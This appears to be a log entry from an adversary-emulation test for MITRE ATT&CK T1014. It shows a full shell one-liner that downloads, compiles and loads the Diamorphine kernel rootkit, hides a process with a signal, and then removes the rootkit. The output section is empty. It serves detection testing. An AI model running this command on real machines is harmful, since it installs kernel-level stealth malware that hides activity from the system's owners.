[+] Tactic ID   : T1014
[+] Technique   : Rootkit: Loadable Kernel Module - Diamorphine
[+] Command     :
mkdir -p ./Linux_output/Defence_Evasion && { REPO="https://github.com/m0nad/Diamorphine/"; REV="898810523aa2033f582a4a5903ffe453334044f9"; ROOTKIT_NAME="diamorphine"; ROOTKIT_PATH="/lib/modules/$(uname -r)/${ROOTKIT_NAME}.ko"; TMP_DIR="/tmp/atomic"; OUTPUT_FILE="./Linux_output/Defence_Evasion/T1014_4_Defence_evasion.txt"; mkdir -p "${TMP_DIR}" && cd "${TMP_DIR}" && curl -sLO "${REPO}/archive/${REV}.zip" && unzip "${REV}.zip" && cd Diamorphine-"${REV}" && make && sudo cp "${ROOTKIT_NAME}.ko" "${ROOTKIT_PATH}" && sudo depmod -a && sudo modprobe "${ROOTKIT_NAME}" && ping -c 10 localhost >/dev/null & TARGETPID="$!" && ps "$TARGETPID" && kill -31 "$TARGETPID" && ps "$TARGETPID" || echo "Process $TARGETPID hidden successfully." && kill -63 1 && sudo modprobe -r "${ROOTKIT_NAME}" && sudo rm -rf "${ROOTKIT_PATH}" "${TMP_DIR}" && sudo depmod -a; echo "Diamorphine LKM Rootkit Simulation Completed."; } &> ./Linux_output/Defence_Evasion/T1014_4_Defence_evasion.txt
[+] Success
----- OUTPUT START -----

----- OUTPUT END -----
